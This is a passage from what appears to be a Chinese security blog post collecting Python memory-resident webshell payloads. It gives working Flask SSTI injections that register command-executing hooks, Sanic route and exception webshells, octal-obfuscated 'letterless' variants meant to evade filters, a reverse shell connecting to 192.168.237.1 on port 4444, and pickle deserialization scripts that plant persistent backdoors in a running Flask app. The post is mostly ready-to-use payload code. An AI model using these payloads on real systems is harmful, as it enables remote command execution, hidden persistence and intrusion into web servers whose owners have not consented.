<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>]( <span class="string">&quot;app.template_context_processors[None].append( lambda : &#123; &#x27;cmd&#x27;: __import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read() &#125; )&quot;</span>, &#123; <span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>] &#125; )<span class="comment">## context_processor</span></span><br></pre></td></tr></table></figure>

<p>之后用 ssti <code>&#123;&#123;cmd&#125;&#125;</code> 就能获取命令回显</p>
<h2 id="sanic框架内存马"><a href="#sanic框架内存马" class="headerlink" title="sanic框架内存马"></a>sanic框架内存马</h2><h3 id="add-route"><a href="#add-route" class="headerlink" title="add_route"></a>add_route</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.add_route(<span class="keyword">lambda</span> request: <span class="built_in">__import__</span>(<span class="string">&quot;os&quot;</span>).popen(request.args.get(<span class="string">&quot;cmd&quot;</span>)).read(),<span class="string">&quot;/shell&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>])</span><br></pre></td></tr></table></figure>

<h3 id="exception"><a href="#exception" class="headerlink" title="exception"></a>exception</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.exception(Exception)(<span class="keyword">lambda</span> request, exception: <span class="built_in">__import__</span>(<span class="string">&quot;sanic&quot;</span>).response.text(<span class="built_in">__import__</span>(<span class="string">&quot;os&quot;</span>).popen(request.args.get(<span class="string">&quot;cmd&quot;</span>)).read()))</span><br></pre></td></tr></table></figure>

<h2 id="抄来的姿势"><a href="#抄来的姿势" class="headerlink" title="抄来的姿势"></a>抄来的姿势</h2><h3 id="无字母内存马"><a href="#无字母内存马" class="headerlink" title="无字母内存马"></a>无字母内存马</h3><ul>
<li>flask可以使用<code>[&#39;&#39;]</code>替换<code>.</code>，来访问对象属性，例如：<code>&#39;&#39;.__class__</code>,<code>&#39;&#39;[&#39;__class__&#39;]</code></li>
<li>flask可以解析引号里的进制，例如十六进制，八进制，十进制</li>
<li>flask可以使用<code>__import__</code>来导入模块，例如：<code>__import__(&#39;os&#39;)</code></li>
</ul>
<p>原payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>[<span class="string">&#x27;__class__&#x27;</span>][<span class="string">&#x27;__base__&#x27;</span>][<span class="string">&#x27;__subclasses__&#x27;</span>]()[<span class="number">137</span>][<span class="string">&#x27;__init__&#x27;</span>][<span class="string">&#x27;__globals__&#x27;</span>][<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None, []).append(lambda: __import__(&#x27;os&#x27;).popen(__import__(&#x27;flask&#x27;).request.args.get(&#x27;a&#x27;)).read())&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>无字母payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>[<span class="string">&#x27;\137\137\143\154\141\163\163\137\137&#x27;</span>][<span class="string">&#x27;\137\137\142\141\163\145\137\137&#x27;</span>][<span class="string">&#x27;\137\137\163\165\142\143\154\141\163\163\145\163\137\137&#x27;</span>]()[<span class="number">137</span>][<span class="string">&#x27;\137\137\151\156\151\164\137\137&#x27;</span>][<span class="string">&#x27;\137\137\147\154\157\142\141\154\163\137\137&#x27;</span>][<span class="string">&#x27;\137\137\142\165\151\154\164\151\156\163\137\137&#x27;</span>][<span class="string">&#x27;\145\170\145\143&#x27;</span>](<span class="string">&quot;\163\171\163.\155\157\144\165\154\145\163[&#x27;\137\137\155\141\151\156\137\137&#x27;].\137\137\144\151\143\164\137\137[&#x27;\141\160\160&#x27;].\142\145\146\157\162\145\137\162\145\161\165\145\163\164\137\146\165\156\143\163.\163\145\164\144\145\146\141\165\154\164(\116\157\156\145, []).\141\160\160\145\156\144(\154\141\155\142\144\141: \137\137\151\155\160\157\162\164\137\137(&#x27;\157\163&#x27;).\160\157\160\145\156(\137\137\151\155\160\157\162\164\137\137(&#x27;\146\154\141\163\153&#x27;).\162\145\161\165\145\163\164.\141\162\147\163.\147\145\164(&#x27;\141&#x27;)).\162\145\141\144())&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<h3 id="无字母弹shell"><a href="#无字母弹shell" class="headerlink" title="无字母弹shell"></a>无字母弹shell</h3><p>原payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>[<span class="string">&#x27;__class__&#x27;</span>][<span class="string">&#x27;__base__&#x27;</span>][<span class="string">&#x27;__subclasses__&#x27;</span>]()[<span class="number">137</span>][<span class="string">&#x27;__init__&#x27;</span>][<span class="string">&#x27;__globals__&#x27;</span>][<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;python3 -c \&#x27;import os,pty,socket;s=socket.socket();s.connect((&quot;192.168.237.1&quot;,4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(&quot;sh&quot;)\&#x27;&#x27;</span>)[<span class="string">&#x27;read&#x27;</span>]()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>无字母payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>[<span class="string">&#x27;\137\137\143\154\141\163\163\137\137&#x27;</span>][<span class="string">&#x27;\137\137\142\141\163\145\137\137&#x27;</span>][<span class="string">&#x27;\137\137\163\165\142\143\154\141\163\163\145\163\137\137&#x27;</span>]()[<span class="number">137</span>][<span class="string">&#x27;\137\137\151\156\151\164\137\137&#x27;</span>][<span class="string">&#x27;\137\137\147\154\157\142\141\154\163\137\137&#x27;</span>][<span class="string">&#x27;\160\157\160\145\156&#x27;</span>](<span class="string">&#x27;\160\171\164\150\157\1563 -\143 \&#x27;\151\155\160\157\162\164 \157\163,\160\164\171,\163\157\143\153\145\164;\163=\163\157\143\153\145\164.\163\157\143\153\145\164();\163.\143\157\156\156\145\143\164((&quot;192.168.237.1&quot;,4444));[\157\163.\144\165\1602(\163.\146\151\154\145\156\157(),\146)\146\157\162 \146 \151\156(0,1,2)];\160\164\171.\163\160\141\167\156(&quot;\163\150&quot;)\&#x27;&#x27;</span>)[<span class="string">&#x27;\162\145\141\144&#x27;</span>]()</span><br></pre></td></tr></table></figure>

<h3 id="通过-Undefined-拿-globals"><a href="#通过-Undefined-拿-globals" class="headerlink" title="通过 Undefined 拿 globals"></a>通过 Undefined 拿 globals</h3><p>ssti 用一个模板上下文不存在的变量作起点时，例如 <code>&#123;&#123;aaa.__init__&#125;&#125;</code>，可以拿到一个 <code>&lt;bound method Undefined.__init__ of Undefined&gt;</code>然后可以获取到globals<code>&#123;&#123;aaa.__init__.__globals__&#125;&#125;</code></p>
<h3 id="获取-flask-request-对象"><a href="#获取-flask-request-对象" class="headerlink" title="获取 flask.request 对象"></a>获取 flask.request 对象</h3><p>flask&lt;2.3.0 时，可以用 <code>url_for.__globals__.get(&#39;_request_ctx_stack&#39;)</code> 拿到堆栈</p>
<p>flask&gt;&#x3D;2.3.0 时，可以用 <code>url_for.__globals__[&#39;current_app&#39;].request_context.__globals__[&#39;request_ctx&#39;]</code> 拿到堆栈</p>
<p>上面这两种拿法都是获取 <strong>RequestContext</strong> 对象，然后用 <code>RequestContext.request</code> 的方式来获取 request<br>可以直接用 <code>url_for.__globals__[&#39;request&#39;]</code>来获取request对象</p>
<h3 id="pickle反序列化打内存马"><a href="#pickle反序列化打内存马" class="headerlink" title="pickle反序列化打内存马"></a>pickle反序列化打内存马</h3><h4 id="before-request-1"><a href="#before-request-1" class="headerlink" title="before_request"></a>before_request</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">A</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">eval</span>,(<span class="string">&quot;__import__(\&quot;sys\&quot;).modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None, []).append(lambda :__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;gxngxngxn&#x27;)).read())&quot;</span>,))</span><br><span class="line"></span><br><span class="line">a = A()</span><br><span class="line">b = pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(b))</span><br></pre></td></tr></table></figure>

<h4 id="after-request-1"><a href="#after-request-1" class="headerlink" title="after_request"></a>after_request</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">A</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">eval</span>,(<span class="string">&quot;__import__(&#x27;sys&#x27;).modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get(&#x27;gxngxngxn&#x27;) and exec(\&quot;global CmdResp;CmdResp=__import__(\&#x27;flask\&#x27;).make_response(__import__(\&#x27;os\&#x27;).popen(request.args.get(\&#x27;gxngxngxn\&#x27;)).read())\&quot;)==None else resp)&quot;</span>,))</span><br><span class="line"></span><br><span class="line">a = A()</span><br><span class="line">b = pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(b))</span><br></pre></td></tr></table></figure>

<h4 id="errorhandler-1"><a href="#errorhandler-1" class="headerlink" title="errorhandler"></a>errorhandler</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">A</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">exec</span>,(<span class="string">&quot;global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;gxngxngxn&#x27;)).read()&quot;</span>,))</span><br><span class="line"></span><br><span class="line">a = A()</span><br><span class="line">b = pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(b))</span><br></pre></td></tr></table></figure>


<p>以上payload来自以下文章：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/gxngxngxn/p/18181936">https://www.cnblogs.com/gxngxngxn/p/18181936</a><br><a target="_blank" rel="noopener" href="https://the0n3.top/pages/77dbc1/">https://the0n3.top/pages/77dbc1/</a><br><a target="_blank" rel="noopener" href="https://asal1n.github.io/2024/10/18/python%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&&%E5%86%85%E5%AD%98%E9%A9%AC/">https://asal1n.github.io/2024/10/18/python%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&amp;&amp;%E5%86%85%E5%AD%98%E9%A9%AC/</a><br><a target="_blank" rel="noopener" href="https://www.caterpie771.cn/2024/09/27/flask-%E5%86%85%E5%AD%98%E9%A9%AC/">https://www.caterpie771.cn/2024/09/27/flask-%E5%86%85%E5%AD%98%E9%A9%AC/</a></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/link/">Friends</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%8E%E7%89%88%E6%9C%AC%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">1.</span> <span class="toc-text">低版本内存马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B0%E7%89%88%E6%9C%AC%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.</span> <span class="toc-text">新版本内存马</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#add-url-rule-%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">add_url_rule 绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#before-request"><span class="toc-number">2.2.</span> <span class="toc-text">before_request</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#after-request"><span class="toc-number">2.3.</span> <span class="toc-text">after_request</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#endpoint"><span class="toc-number">2.4.</span> <span class="toc-text">endpoint</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#errorhandler"><span class="toc-number">2.5.</span> <span class="toc-text">errorhandler</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#teardown-request"><span class="toc-number">2.6.</span> <span class="toc-text">teardown_request</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#teardown-appcontext"><span class="toc-number">2.7.</span> <span class="toc-text">teardown_appcontext</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#url-value-preprocessor"><span class="toc-number">2.8.</span> <span class="toc-text">url_value_preprocessor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#context-processor"><span class="toc-number">2.9.</span> <span class="toc-text">context_processor</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sanic%E6%A1%86%E6%9E%B6%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">3.</span> <span class="toc-text">sanic框架内存马</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#add-route"><span class="toc-number">3.1.</span> <span class="toc-text">add_route</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exception"><span class="toc-number">3.2.</span> <span class="toc-text">exception</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%84%E6%9D%A5%E7%9A%84%E5%A7%BF%E5%8A%BF"><span class="toc-number">4.</span> <span class="toc-text">抄来的姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">4.1.</span> <span class="toc-text">无字母内存马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E5%BC%B9shell"><span class="toc-number">4.2.</span> <span class="toc-text">无字母弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87-Undefined-%E6%8B%BF-globals"><span class="toc-number">4.3.</span> <span class="toc-text">通过 Undefined 拿 globals</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96-flask-request-%E5%AF%B9%E8%B1%A1"><span class="toc-number">4.4.</span> <span class="toc-text">获取 flask.request 对象</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%89%93%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">4.5.</span> <span class="toc-text">pickle反序列化打内存马</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#before-request-1"><span class="toc-number">4.5.1.</span> <span class="toc-text">before_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#after-request-1"><span class="toc-number">4.5.2.</span> <span class="toc-text">after_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#errorhandler-1"><span class="toc-number">4.5.3.</span> <span class="toc-text">errorhandler</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&text=内存马"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&is_video=false&description=内存马"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=内存马&body=Check out this article: https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&name=内存马&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&t=内存马"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Oceanzbz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/link/">Friends</a></li><!--
     -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
          <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  <script async src="https://www.googletagmanager.com/gtag/js?id=G-QWTJSPQL4F"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-QWTJSPQL4F');
</script>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
